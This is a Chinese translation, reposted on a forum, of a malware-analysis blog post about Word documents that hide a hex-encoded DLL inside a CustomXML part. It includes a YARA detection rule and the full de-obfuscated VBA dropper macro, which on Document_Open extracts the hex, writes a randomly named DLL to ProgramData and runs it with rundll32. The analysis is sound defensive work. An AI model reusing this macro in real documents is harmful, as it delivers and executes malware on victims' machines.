本帖最后由 梦幻的彼岸 于 2022-10-11 09:34 编辑
文章地址:https://inquest.net/blog/2022/10/03/hiding-xml 翻译:梦幻的彼岸 Hiding in the XMLPosted on 2022-10-03 by David Ledbetter 在这篇文章中,我想介绍一个叫做 "CustomXMLParts "的项目。 试图查找这个术语,你可以找到关于它是什么的各种说法。简而言之,它是一个XML容器,用于存储将在文档中使用的任意数据。它的目的似乎是为开发者提供一种方法,以改变Office文档的格式,而这是目前还没有的,或增加额外的功能。 在这种情况下,他们在 "customXml -> item1.xml "中存储了一个十六进制编码的可执行文件。 创建一个YARA规则来搜索我的版本库,只搜索 "custom-xml-content",这让我发现这是一个很好的项目,但仔细检查规则所涉及的几个文件,发现它们并没有被恶意使用。 因此,我也制定了一个新的规则来搜索这个十六进制字符串。 - rule Find_CustomXmlContent
- {
- meta:
- author = "David Ledbetter @Ledtech3"
- source = "https://twitter.com/StopMalvertisin/status/1571036662968512512"
- description = "Generic rule to find extracted custom-xml-content files."
- created = "2022-09-24"
- strings:
- $s0 = "custom-xml-content" nocase //Xml Tag in file
- $s1 = "customxml" nocase // Found in the vba not needed but left in
- $h0 = {2F 22 3E 34 64 35 61 39 30} // /">4d5a90 Hex str inside xml tag.
- condition:
- any of ($s*) and $h0
- }
复制代码这条规则只对解压后有 "PK "标题的办公文件起作用。 VBA是相当复杂的,所以让我们快速看一下。 这里我们看到在 "Document_Open() "上它只调用了1个函数。"FoalhoodPretransmitGlomerulose()" - Sub Document_Open()
- FoalhoodPretransmitGlomerulose
- End Sub
- Function FoalhoodPretransmitGlomerulose()
- Dim PharmacalLimnology() As Byte 'Extracted hex string to bytes
- Dim AnchorerCrawfishesRedditive As String 'full file path
- Dim JeersCreatinephosphoric As Integer 'not used
- If False Then 'Not sure what makes it false.
- AnchorerCrawfishesRedditive = "c:\ProgramData\xxx.dll" 'Not totaly sure found several sanbox runs with this filename.
- Else
- PharmacalLimnology = NonfamilyMandraSonnets("mEGmZfelmibJrBrK") 'Extract Hex string from CustomXml and convert to byte
- AnchorerCrawfishesRedditive = "c:\ProgramData" + CriminisBadigeonEthylating(8) + ".dll" 'CriminisBadigeonEthylating(8) = build random file name 8 Chrs long
- ClawerLognormality PharmacalLimnology, AnchorerCrawfishesRedditive 'Write bytes to file
- End If
- Shell "rundll32 " + AnchorerCrawfishesRedditive + ",#1" 'Run File
- End Function
- Function NonfamilyMandraSonnets(SoulhealLongnose) 'Function extracts hexstring
- Dim PotophobiaTintypeSeptempartite, StereotacticallyUnapostolical
- Set PotophobiaTintypeSeptempartite = CallByName(ActiveDocument, "CustomXMLParts", VbGet, "http://" & SoulhealLongnose & "/")
- Set StereotacticallyUnapostolical = CallByName(PotophobiaTintypeSeptempartite, "SelectSingleNode", VbMethod, "/*[local-name()='custom-xml-content']")
- NonfamilyMandraSonnets = MisjudgingExpressnessHookas(CallByName(StereotacticallyUnapostolical, "Text", VbGet))
- End Function
- Function CriminisBadigeonEthylating(ConfermentPrecooledFinks As Integer) 'Function builds a random filename the length of the value passed '8'
- Dim MenyanthaceaeGarridgeAnnelides As Integer
- Dim DiaphonesHillier As Single
- Dim GadfliesPteropodous As String
- GadfliesPteropodous = ""
- For MenyanthaceaeGarridgeAnnelides = 1 To ConfermentPrecooledFinks
- DiaphonesHillier = Rnd
- If DiaphonesHillier > 0.2 Then
- GadfliesPteropodous = GadfliesPteropodous + BabicheDeprecativelyHippies()
- ElseIf DiaphonesHillier > 0.6 Then
- GadfliesPteropodous = GadfliesPteropodous + NebbuckBarometryQuillwort()
- Else
- GadfliesPteropodous = GadfliesPteropodous + SternfullyDoggishnessTalmudists()
- End If
- Next MenyanthaceaeGarridgeAnnelides
- CriminisBadigeonEthylating = GadfliesPteropodous
- End Function
- Function ClawerLognormality(EsthiomenusOutgabblingTympanicity, HybridizerSequestrationsProjectional) 'Writes file bytes to the path/filename passed
- Dim WomanishTwelfthly As Long
- Dim BromizePassagingNoncontemplative As Integer
- BromizePassagingNoncontemplative = FreeFile
- Open HybridizerSequestrationsProjectional For Binary Access Write As #BromizePassagingNoncontemplative
- For WomanishTwelfthly = 0 To UBound(EsthiomenusOutgabblingTympanicity) - 1
- Put #BromizePassagingNoncontemplative, WomanishTwelfthly + 1, CByte(EsthiomenusOutgabblingTympanicity(WomanishTwelfthly))
- Next WomanishTwelfthly
- Close #BromizePassagingNoncontemplative
- End Function
- Function MisjudgingExpressnessHookas(MountebanklyNeuropsychologistNitrosoamine) 'Convert Hex string to bytes array
- ReDim CalcaneoscaphoidPolypetalAudiophiles(Len(MountebanklyNeuropsychologistNitrosoamine) / 2) As Byte
- Dim UnawaredChelydidae As Long, SifterCywyddHandclapping As Long
- Dim SporulativeHamauls
- SporulativeHamauls = "&H"
- For UnawaredChelydidae = 1 To Len(MountebanklyNeuropsychologistNitrosoamine) Step 2
- CalcaneoscaphoidPolypetalAudiophiles((UnawaredChelydidae - 1) / 2) = CDec(SporulativeHamauls & Mid(MountebanklyNeuropsychologistNitrosoamine, UnawaredChelydidae, 2))
- Next
- MisjudgingExpressnessHookas = CalcaneoscaphoidPolypetalAudiophiles
- End Function
复制代码这个代码块包含了提取、释放和运行dll所需的所有代码。 正如我们在注释的代码块中所看到的,它将找到并提取十六进制字符串,将其转换为字节数组,并从给定的长度建立一个随机文件名。然后,它将把文件写到磁盘上,然后运行它。 除非我错过了什么,否则代码的其余部分似乎没有被使用。 这个样本的文件哈希值是来自YARA规则的。 Kimberly @StopMalvertisin的Twitter链接在这里。该线程显示,该文件最初是作为 "rtf "发送的,但事实上,它是一个docx文件。(永远不要相信文件的扩展名) 这里面的诱饵似乎在我查看的文件中被重复使用。对图片文件的文件名 "VIYb.pg"(被检测为域名)进行搜索,我们目前得到132次点击。昨天是125次。 对所有43个文件进行列表比较后发现,InQuest实验室的这个列表包含了所有43个哈希值。 此外,在同一Twitter主题中,ExecuteMalware @executemalware在GitHub上发布了一个IOC的链接。 这些文件是通过电子邮件发送的,通常最后会被植入恶意软件。 虽然这些文件一旦被解压就很容易被发现,但他们似乎仍在对vba进行修改,如果他们不在某个时候开始对Xml中的十六进制字符串进行编码,我不会感到怀疑。即使混淆了Xml标记中包含的项目的绝对大小,也是一种泄露和检测的可能性。